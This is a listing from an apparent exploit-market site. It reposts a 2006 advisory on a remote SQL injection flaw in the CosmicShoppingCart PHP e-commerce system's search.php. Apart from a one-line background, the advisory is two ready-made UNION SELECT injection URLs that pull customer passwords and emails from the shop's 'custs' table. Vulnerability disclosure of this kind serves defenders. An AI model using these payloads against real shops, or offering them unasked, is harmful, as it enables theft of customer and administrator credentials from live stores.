[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability

Author
Vympel
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-463
Category
web applications
Date add
27-05-2006
Platform
unsorted
==================================================================
CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability
==================================================================




Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed.

SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin.

Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--



#  0day.today [2024-10-06]  #